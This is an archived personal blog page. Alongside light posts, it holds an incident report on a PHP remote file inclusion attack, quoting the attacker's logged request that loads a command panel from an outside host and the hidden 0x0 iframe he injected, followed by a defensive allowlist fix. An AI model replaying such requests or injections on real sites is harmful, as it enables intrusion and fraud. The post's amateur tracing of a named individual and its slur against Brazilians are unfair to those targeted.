soledad penadés
repeat 4[fd 100 rt 90]

Archive for May, 2006

20060528 I wish I had been there

inxs

Would you please play a fucking riff for me?
Oh, excuse me… :D

INXS Live Baby Live tour, (Old) Wembley Stadium, London, 1991

inxs

Best. Band. Ever.

(Sorries to Coldplay and U2 fans!)

Testing Quicksilver

As I have been using a Mac for more than one year, I considered that it was time to start using superadvanced tools for savvy users, such as Quicksilver. It's been 10 minutes since I installed it and I must say this:

  1. The installation process is so full of nice transitions that it deserves to be installed just to see them
  2. It's quick! It does not work exactly like Spotlight (I doubt it indexes file contents as Spotlight does), but it feels fast, and launches applications faster than Spotlight (which is the main use I give to Spotlight)
  3. I absolutely love the configuration options, where it refers to the effects as "Superfluous visual effects". This kind of honesty has not been seen for a long time. Funnily enough, although they may be superfluous, they really look cool and don't annoy you like the usual effects you see in other applications.
    Quicksilver

There is more info for beginners in blogs like TUAW: Getting Started with Quicksilver: understanding the basics, just in case you feel curious.

Idiots with nothing to do

We just found some HTML appended to the end of every HTML and PHP file for almost all of our sites. How come, we asked?

I took a look at the server logs for every domain. I was looking for a POST request, since I figured that it must have been some script kiddie trying to break into our pages with this dumb method. In little time I found something as suspicious as the following:

201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"

If you open the included URL (http://www.tnwhunters.com/cmd01.txt) you see that the server is returning a plain text file which was interpreted as PHP by the script in neonv2, hence making all the code that he put in that file available to him. (Obviously we have fixed it immediately and you can't do it anymore.) Also, the page for the server itself is related to animal hunting, which is completely off-topic. Weird…
That code (take a look, it won't open any pop-up… it's simple plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and just exploit it, by getting their control panel loaded. Which curiously is half written in Brazilian. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff.
The question is why did this idiot add this piece of HTML to every page and script? Not to become famous, since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added code like this:

iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 …

This code apparently belongs to an affiliates programme (based in China) in which he would get paid for each impression the servers at free20 received with his affiliate program. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0×0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:

It is easy to confirm that both soaukers are the same even if they don't have the same e-mail addresses, because he still uses "Adivinha seuburro" as a fake name, both in the security announcement and in this forum post as well. Curiously, the forum is related to FreeBSD and in his attacks he used a *nix system, Debian. It all matches.

There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which are still related to Linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy who studied there in 2004 and was deeply interested in hacking and *nix systems.

So Brazilians didn't have enough with spamming our nice orkut scrapbooks with crap messages, now they also try to earn money the quick way. Ridiculous…

It is a pity that I can't find any website or abuse e-mail address for his internet provider so I could send them the logs he produced, but anyway I hope this is useful for someone.

Final advice: always always always filter input arguments for your script.
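
The section-loading pattern described in this post and the input filtering it recommends, as an added example (not code from the affected site). The `go` parameter name is taken from the logged request; the section names, file paths and sample inputs are hypothetical.

```php
<?php
// Added example. Section names and paths are hypothetical.

// BEFORE (vulnerable pattern, kept as a comment for contrast): the request
// value goes straight into include, so a URL in `go` makes PHP fetch remote
// text and run it as PHP when URL includes are enabled.
//   include $_GET['go'];

// AFTER: the request value is only ever used as a key into a fixed map.
const SECTIONS = [
    'home'    => 'sections/home.php',
    'news'    => 'sections/news.php',
    'contact' => 'sections/contact.php',
];

/**
 * Map a requested section name to a local file, or null when the name is
 * not on the allowlist. Nothing from the request ever reaches the path.
 */
function resolve_section($requested): ?string
{
    // go[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($requested)) {
        return null;
    }
    return SECTIONS[$requested] ?? null;
}

function render_section(array $query): void
{
    $file = resolve_section($query['go'] ?? 'home');
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown section';
        return;
    }
    include __DIR__ . '/' . $file;
}

// Constructed sample inputs: a valid section, a remote URL of the kind seen
// in the log, a path traversal attempt and an array parameter.
$samples = ['news', 'http://remote.example/cmd.txt?', '../../etc/passwd', ['x']];
foreach ($samples as $sample) {
    var_dump(resolve_section($sample));
}
```

As a second layer, `allow_url_include = Off` in php.ini (available from PHP 5.2) stops `include` from fetching URLs at all, and `allow_url_fopen = Off` does the same for the other file functions where remote reads are not needed.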

And for Soauker: GET A FUCKING LIFE!

20060525 Well, I'm not a geek

Ever since I read this morning about showing the geekiest object you have at home, I've been turning it over and over to see if anything comes to mind, but nothing. The bookshelf is already tired of me staring at it, and I just can't find anything particularly "geeky" among my possessions.

So when I saw the frikitest on one of these websites proclaiming Geek Pride Day, I thought that maybe taking it would settle the question: am I a geek or not? Well, this is the result:
frikitest

From which I deduce that I AM NOT A GEEK.

I'm sorry if this disappoints anyone, because I know there are people who love imagining geek girls and may believe I'm a good prototype and an even better catch, but honestly, looking at the test questions I can confirm that my suspicions were right and you are all mistaken.

And in fact, I will feel truly offended the next time anyone so much as hints that I'm a geek. Some reasons:

  • Geeks study languages, the weirder the better if possible. I, on the other hand, can't manage to learn any language other than English. And when I try to speak other languages, I come out with an English accent and pronunciation. In fact, I can't speak Catalan without dropping "I mean", "Sorry" and the like in mid-sentence.
  • Geeks wear more than two watches. I don't even wear one.
  • Geeks queue to see cult or "important" films. I forget to go to the cinema. And I have never queued for more than 10 minutes to buy a cinema ticket.
  • I haven't read The Silmarillion, The Hobbit, any Harry Potter book, The Hitchhiker's Guide to the Galaxy, etc…
  • I'm completely ignorant about manga
  • The last comic I bought must have been before I started university (1997)
  • I haven't painted (nor do I own) miniatures
  • The last thing I collected must have been the points for using my VISA, which I never remembered to redeem for gifts as fantabulous as a set of towels or a battery-powered juicer.
  • Geeks don't turn down dates. I do.
  • Geeks love talking about their geek world on dates. Spending hours talking about the geek world wears me out (a reason not to accept a second date with a geek!)
    Not that I'm dating anyone now either, obviously ;)
  • Geeks stay sat in front of the computer for a whole party. I'm the one who sits in front of the computer sometimes.

No hard feelings!

:D

Be careful with language packs…

I was just installing a Spanish language pack for some Open Source product we use, and I decided to take a look at the constants before installing:

"Cagando… por favor, espere"

Ask anyone who understands Spanish. I'm still laughing! =))
Next time you get some translation packs, try to get someone who speaks that language to proofread them. It also applies to automatic translations a la Babelfish :D

UPDATE: seems like there are still a couple of sites with that wrong language pack

UPDATE v2: An example of the message! :D